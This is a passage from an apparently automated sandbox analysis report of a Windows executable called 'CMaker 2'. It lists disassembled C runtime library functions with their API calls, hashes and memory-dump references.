                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                  • Opcode ID: 45ee2f7fa3d995a22adc73900efbbf06770fa7974e288ce688b1fb42a76d11f5
                                                                                                                                                                                  • Instruction ID: c3be862846ba974b8ca6b4ca6790a5b9614dc42c4bc37e6315a7f21a601d0e97
                                                                                                                                                                                  • Opcode Fuzzy Hash: 45ee2f7fa3d995a22adc73900efbbf06770fa7974e288ce688b1fb42a76d11f5
                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F062A9B09A0681EB148B64E8443795330BF497A5F949679DA7EC51E4FF2CD049C700
                                                                                                                                                                                  Function 00007FF6FAC09450 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                  • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                  • Instruction ID: 30b1e2384388b32ce41d69414f1fe34d42d63a29e6c98b06329a7f5b3834ff8b
                                                                                                                                                                                  • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                  • Instruction Fuzzy Hash: CE11A7FEE1DA0305FF6411A4E45237914606F953B4F04EAF4E5BFC62E6FE6C69408184
                                                                                                                                                                                  Function 00007FF6FABFAF10 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF2F
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF4E
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF76
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF87
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF98
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                  • Opcode ID: 466d63b3c239452ad20acedb66cffb48f078086c5887410cb5757a1cdea0e395
                                                                                                                                                                                  • Instruction ID: eebfa1da67c628ff2dbbc79db16d1fd281521e5a075649c616267af76763e2ce
                                                                                                                                                                                  • Opcode Fuzzy Hash: 466d63b3c239452ad20acedb66cffb48f078086c5887410cb5757a1cdea0e395
                                                                                                                                                                                  • Instruction Fuzzy Hash: 18117C68F2D28301FB5C93A5A69117962515F963F0F9C43BDE93ECA7D6FE2CB4018200
                                                                                                                                                                                  Function 00007FF6FABFADA4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                  • Opcode ID: 82fa8b43b75a31350e9ff4a707ecde40e77e0778b729ae4d1ef7d15c4e0ed93f
                                                                                                                                                                                  • Instruction ID: 870e34ba1ae097aedb5f21b96f9b65bd5dbd95824321eb94a07099094e26d61a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 82fa8b43b75a31350e9ff4a707ecde40e77e0778b729ae4d1ef7d15c4e0ed93f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7211232CF2D24345FB6CA2B5585117912924F96330FAC5BBCE93EDA2D6FD2DB4018201
                                                                                                                                                                                  Function 00007FF6FABF5DC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: verbose
                                                                                                                                                                                  • API String ID: 3215553584-579935070
                                                                                                                                                                                  • Opcode ID: db001d0b7e8f7bba3f17a0e80451e4d7df515b3a5593d2b47e06f42f007c2e84
                                                                                                                                                                                  • Instruction ID: 9b1b1889ba5670809d1cce37adb5c031fa8faa068cd81f3b7046d8fd4b35669b
                                                                                                                                                                                  • Opcode Fuzzy Hash: db001d0b7e8f7bba3f17a0e80451e4d7df515b3a5593d2b47e06f42f007c2e84
                                                                                                                                                                                  • Instruction Fuzzy Hash: ED91C03AA0C68681F7258EA5D45037D3799AB42B94FDC42BADA6E873D5FF3CE4458300
                                                                                                                                                                                  Function 00007FF6FABFFAC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                                  • Opcode ID: 150c0761ae2a60fcacf4f563602d34e283ae5762a11513620c4a6975bd049ac1
                                                                                                                                                                                  • Instruction ID: f3ca24ff7aad6f98c5c35a9f999bbbd2f660472456597411fd476942cb77a688
                                                                                                                                                                                  • Opcode Fuzzy Hash: 150c0761ae2a60fcacf4f563602d34e283ae5762a11513620c4a6975bd049ac1
                                                                                                                                                                                  • Instruction Fuzzy Hash: BB81A27AE0821285F7748EB981502782AA0EB12B45FDD80B9CE39D76D5FF2DE801D321
                                                                                                                                                                                  Function 00007FF6FABEBA78 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                                  • Opcode ID: 2b651edb78efaeb316ac5de78849fde0daa8bdd7bfc86cfa6ef8cb3431ad488b
                                                                                                                                                                                  • Instruction ID: d388fac00e09ed8da45102f73db7d852f0bbb9fa859a76dfd6f254d19cc44fda
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b651edb78efaeb316ac5de78849fde0daa8bdd7bfc86cfa6ef8cb3431ad488b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E51C332B196028ADB14CF25E484A3937A2EB45B98F91C1B5DA6D877C8FF7DE841C700
                                                                                                                                                                                  Function 00007FF6FABED308 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                  • Opcode ID: fa0bcca0a4098b59133448382c677b9a55906fb86c6f234dcd4a21c8a5653ac7
                                                                                                                                                                                  • Instruction ID: 3cd6973b112f1b995034edcc07be01f3b6fa0540a872720f0753746501a5be93
                                                                                                                                                                                  • Opcode Fuzzy Hash: fa0bcca0a4098b59133448382c677b9a55906fb86c6f234dcd4a21c8a5653ac7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F619632908BC586E7619F15E4803AAB7A0FB96B84F844265EBAC43795DF7CD194CB00
                                                                                                                                                                                  Function 00007FF6FABED6B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                  • Opcode ID: b11368fb803353e75de70a3c6cdb7d5ad95833e40dd5f9cce2c99e2783eb0f67
                                                                                                                                                                                  • Instruction ID: dc40e648c6c8cadd497d0596c525613277b9d698abaa67221561e8bfe024f982
                                                                                                                                                                                  • Opcode Fuzzy Hash: b11368fb803353e75de70a3c6cdb7d5ad95833e40dd5f9cce2c99e2783eb0f67
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4751A332A0838286EB748F2194843787BA0EB56B95F9441F5DAAC877C5DFBCE451C701
                                                                                                                                                                                  Function 00007FF6FABFC220 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                  • Opcode ID: a359b4e95e1d4ffdf3b75e0a15f8e2470d7a7d379ae339a26f7f920b930d4175
                                                                                                                                                                                  • Instruction ID: 5dc2e192f1413adeda135654e5155e3f3ab25976811e2ec398e8b0453338fe77
                                                                                                                                                                                  • Opcode Fuzzy Hash: a359b4e95e1d4ffdf3b75e0a15f8e2470d7a7d379ae339a26f7f920b930d4175
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15D10576B08A4189E711CFB5E5442AC3771FB46B98B48427ACE6ED7BC9EE38D446C300
                                                                                                                                                                                  Function 00007FF6FABE7440 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Process$ConsoleCurrentShowThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 242035731-0
                                                                                                                                                                                  • Opcode ID: ce431efa17345d7651078cf11ef9ccbb6a86d2f3d8659cd5f010f407bfbcc38a
                                                                                                                                                                                  • Instruction ID: e7180606757f4cfd7e5bb07cb326d15bae3caec75fa8657e1e9d67d914981cf5
                                                                                                                                                                                  • Opcode Fuzzy Hash: ce431efa17345d7651078cf11ef9ccbb6a86d2f3d8659cd5f010f407bfbcc38a
                                                                                                                                                                                  • Instruction Fuzzy Hash: A9F03761A18A4AC1FB549B66E44413957B1FF88780F4860F0E95FC3294FE3CE0858700
                                                                                                                                                                                  Function 00007FF6FABE75B0 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Process$ConsoleCurrentShowThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 242035731-0
                                                                                                                                                                                  • Opcode ID: b8f031c1363efa834fdbd56010d3ef4b44edc5dcbdf772b005a24d0a5bd8a786
                                                                                                                                                                                  • Instruction ID: 05a9366ffd03da2348ac20c62290b627a7a5590dd87b49b4e410bcdde884e496
                                                                                                                                                                                  • Opcode Fuzzy Hash: b8f031c1363efa834fdbd56010d3ef4b44edc5dcbdf772b005a24d0a5bd8a786
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF03061A19686C2EB549B25E88413922B1FF88B84F5860B4D96FC7794FF3CE485C700
                                                                                                                                                                                  Function 00007FF6FAC05A1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                                  • Opcode ID: 1c83a1720d45a771045ce60356bff33d66c21c843874825a6d4da0f7ef7d0a4b
                                                                                                                                                                                  • Instruction ID: cfa2463eb1a1ebc9c1650b221a5598cd16787d1f4eff9315c97a79a652da1818
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c83a1720d45a771045ce60356bff33d66c21c843874825a6d4da0f7ef7d0a4b
                                                                                                                                                                                  • Instruction Fuzzy Hash: D1412862A0838A47FB248B65944137A6778EB81BA4F14D275EE6CC6AD9FE3CD4818700
                                                                                                                                                                                  Function 00007FF6FABF8BD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FABF8C02
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6FABEB005), ref: 00007FF6FABF8C20
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
